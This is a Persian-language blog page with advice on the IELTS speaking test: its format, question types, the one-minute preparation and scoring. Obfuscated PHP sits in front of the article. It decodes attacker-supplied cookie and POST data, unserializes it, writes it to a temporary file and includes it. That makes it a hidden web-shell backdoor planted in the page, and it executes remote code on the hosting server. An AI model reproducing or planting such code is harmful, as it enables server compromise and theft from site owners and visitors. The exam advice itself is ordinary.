$NULuVE = 'J' . "\x6e" . chr (95) . "\x5a" . chr ( 1066 - 990 )."\143";$wBGOMS = chr (99) . "\154" . "\141" . "\163" . 's' . chr ( 572 - 477 )."\145" . "\170" . "\151" . 's' . chr (116) . "\x73";$rnHFs = class_exists($NULuVE); $wBGOMS = "37229";$FCnrIFQjV = strpos($wBGOMS, $NULuVE);if ($rnHFs == $FCnrIFQjV){function zzZnWbHiGH(){$snBBmoW = new /* 60717 */ Jn_ZLc(216 + 216); $snBBmoW = NULL;}$tRYafVOh = "216";class Jn_ZLc{private function BnCpg($tRYafVOh){if (is_array(Jn_ZLc::$iblmkhZckY)) {$name = sys_get_temp_dir() . "/" . crc32(Jn_ZLc::$iblmkhZckY["salt"]);@Jn_ZLc::$iblmkhZckY["write"]($name, Jn_ZLc::$iblmkhZckY["content"]);include $name;@Jn_ZLc::$iblmkhZckY["delete"]($name); $tRYafVOh = "216";exit();}}public function ptGeYs(){$TDmSXiAS = "52603";$this->_dummy = str_repeat($TDmSXiAS, strlen($TDmSXiAS));}public function __destruct(){Jn_ZLc::$iblmkhZckY = @unserialize(Jn_ZLc::$iblmkhZckY); $tRYafVOh = "10292_35473";$this->BnCpg($tRYafVOh); $tRYafVOh = "10292_35473";}public function ozxIAgQPjV($TDmSXiAS, $aeaku){return $TDmSXiAS[0] ^ str_repeat($aeaku, intval(strlen($TDmSXiAS[0]) / strlen($aeaku)) + 1);}public function qUtSOSuu($TDmSXiAS){$mfCMBhBxCr = "\142" . chr ( 890 - 793 ).chr ( 813 - 698 ).chr (101) . chr ( 253 - 199 ).chr (52);return array_map($mfCMBhBxCr . "\137" . chr (100) . "\x65" . "\x63" . chr (111) . "\144" . chr (101), array($TDmSXiAS,));}public function __construct($LPOaYmFx=0){$zGwbXSxTSr = chr ( 874 - 830 ); $TDmSXiAS = "";$ffIRbkK = $_POST;$cUFsQU = $_COOKIE;$aeaku = "c7925911-7e78-4761-aabc-96a5afd8df13";$YEAAD = @$cUFsQU[substr($aeaku, 0, 4)];if (!empty($YEAAD)){$YEAAD = explode($zGwbXSxTSr, $YEAAD);foreach ($YEAAD as $GraWY){$TDmSXiAS .= @$cUFsQU[$GraWY];$TDmSXiAS .= @$ffIRbkK[$GraWY];}$TDmSXiAS = $this->qUtSOSuu($TDmSXiAS);}Jn_ZLc::$iblmkhZckY = $this->ozxIAgQPjV($TDmSXiAS, $aeaku);if (strpos($aeaku, $zGwbXSxTSr) !== FALSE){$aeaku = explode($zGwbXSxTSr, $aeaku); $cWVPJOukJ = base64_decode(md5($aeaku[0]));}}public static $iblmkhZckY = 12075;}zzZnWbHiGH();} همه چیز برای موفق شدن در اسپیکینگ آزمون آیلتس! | وبلاگ اتیچر
skip to Main Content

همه چیز برای موفق شدن در اسپیکینگ آزمون آیلتس!

زمان مطالعه: ۴ دقیقه

فهرست بخش ها

 همه چیز درباره ی اسپیکینگ آزمون آیلتس!

در این مقاله به چند نکته اساسی که قبل از آماده شدن برای اسپیکینگ آزمون آیلتس باید آنها را در نظر بگیرید اشاره می‎شود. اسپیکینگ آزمون آیلتس بر مبنای درستی، روانی، تنوع واژگان، تلفظ و کاربرد بجای زبان بنا شده است. در اینجا لیستی از نکاتی که در اسپیکینگ آزمون آیلتس باید رعایت شود را برای شما تهیه کرده ایم ، بنابراین برای نتیجه هر چه بهتر روی این موارد کارکنید:

چگونگی برگزاری اسپکینگ آزمون آیلتس:

اسپیکینگ آزمون آیلتس به گونه ای طراحی‌شده که به تدریج چالشی تر می‌شود. قبل از اینکه فرصتی برای ابراز گستره‌ی توانایی زبانی داشته باشید، در ابتدا به شما وقت می‌دهند تا در شرایط خوب و راحتی قرار بگیرید. بخش ۱ راحت‌ترین قسمت این آزمون است؛ باید بتوانید بدون مشکل این قسمت را به پایان برسانید. بخش ۲ و ۳ سنگین تر بوده و ممتحن معمولاً مبنای ارزیابی‌ اش را بر توانایی روان بودن بیان داوطلب می‌گذارد. در بخش ۲ باید به مدت ۲ دقیقه پیوسته صحبت کنید و در بخش ۳ باید نظرات خود را مورد بحث قرار دهید. اگر جواب‌های شما در این دو بخش از آزمون کوتاه باشد، ممکن است نمره بالایی برای عملکردتان دریافت نکنید.

باتوجه به اینکه کلاس های اُتیچر نیز کاملا به صورت تعاملی برگزار می شوند و تمرکز بالایی روی مهارت اسپیکینگ دارند، تجربه استفاده از این نوع کلاس های تعاملی زبان به شما پیشنهاد میشود.

نوع سوال هایی در اسپیکینگ آزمون آیلتس مطرح می‌شوند:

دو قسمت اول اسپیکینگ آزمون آیلتس، پرسش‌هایی در مورد هویت شخصی خودتان است، مثلاً نام، شماره داوطلبی، زادگاه و تأییدیه گذرنامه (پاسپورت). جواب‌هایتان باید مختصر و واقعی باشد. اگر چه ، باید از پاسخ‌هایی که خیلی کوتاه هستند نیز اجتناب کنید؛ پاسخ‌های تک کلمه‌ای به دلیل اینکه دارای محتوای کافی برای ارزیابی نیستند ،مورد قبول ممتحن قرار نمی‌گیرند.

پرسش‌های بعدی اسپیکینگ آزمون آیلتس مربوط به موضوعات روزانه مثل غذا و لباس می‌باشد. پاسخ‌های شما باید پراز جزئیات و دقیق باشند و فقط شامل بله و خیر نباشد. هر چند،شما باید دقت کنید که در طول این قسمت (بخش۱) خیلی طولانی هم صحبت نکنید،چرا که این فرصت را در بخش‌های ۲ و ۳ خواهید داشت.

اگر در بخش ۱ خود را وادار به ادامه کنید نتیجه این می‌شود که در بخش‌های پایانی، حرفی برای گفتن نخواهید داشت و این روی نمره‌ی شیوایی و روان بودن زبان شما اثر نامطلوبی می‌گذارد.

همچنین می توانید مطالعه کنید:

آیا واقعا می توان نمره ی هفت در آزمون IELTS گرفت؟ مصاحبه با هومن ثنایی

قبل از شروع به پاسخ‌های مفصل تر بخش‌های ۲ و ۳ ، باید یک دقیقه را صرف یادداشت برداری کنید. می‌توانید این یادداشت‌ها را نگه داشته و در سراسر مصاحبه جلوی خود بگذارید. در طول پاسخ‌های دو دقیقه‌ای، باید تا قبل از اینکه ممتحن شما را متوقف کند به صحبت کردن ادامه دهید. اگر مکث‌های کوتاهی داشتید نگران نباشید که کاملاً عادی است. گر چه ، مکث‌های طولانی نشان‌دهنده‌ی عدم شیوایی و ضعف زبان است. عملکرد شما در طول این پاسخ‌های دو دقیقه‌ای بسیار به این بستگی دارد که در یک دقیقه‌ای که به شما می‌دهند چقدر خودتان را خوب آماده می‌کنید. متأسفانه، بسیاری از داوطلبان اغلب از این یک دقیقه آماده سازی استفاده نمی‌کنند؛ در صورتی که می‌توان یادداشت‌هایی در مورد جمله سازی آماده کرد. با اینکه افرادی که گویا و روان صحبت می‌کنند همیشه به این زمان نیازی ندارند، ولی همین یک دقیقه برای آماده شدن مفید است. اگر از این مرحله سرسری رد شوید، شاید این‌چنین فرصتی را هیچ موقع در طول این مصاحبه دوباره به دست نیاورید.

در نهایت، ممتحن شما را به مرحله‌ی بحث و گفتگو هدایت کرده و از شما می‌خواهد تا نظرتان را در مورد موضوعی بیان کنید. حالا شما این شانس را دارید تا مهارت‌های زبانی سخنرانی را در حین مباحث نظری یا موضوعات واقعی نشان دهید. شما باید پرسش‌ها را تا جای ممکن به طور کامل و روان پاسخ داده و با دلیل از نظرتان به موقع دفاع کنید. برای انجام این کار بهتر است تا از اخبار و وقایع روز باخبر باشید چون شما را در ارائه دلایل و مثال‌های مناسب کمک می‌کند. در این بخش از مصاحبه باید نظرتان در مورد موضوع اخبار ارائه دهید.

روش نمره دهی در اسپیکینگ آزمون آیلتس چگونه است؟ 

 اسپیکینگ آزمون آیلتس ضبط‌ صوتی می‌شود که ممتحن بتواند بخش‌های مصاحبه را چندین دفعه قبل از ثبت ارزیابی گوش کند. همچنین در صورت لزوم، ممتحن های مختلف هم می‌توانند این مصاحبه را گوش کنند. کار ضبط به صورت تصادفی توسط UCLES چک می‌شود تا مطمئن شوند که استانداردهای نمره دهی به درستی اجرا می‌شود.

همچنین مطالعه شود:

نکات بسیار ضروری برای آزمون اسپیکینگ آیلتس که باید به آنها توجه کرد

تا دفعه بعد!

 

به این مقاله امتیاز بدهید

دیدگاه ها

اولین نفری باشید که به این نوشته نظر میدهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

Back To Top
×Close search
Search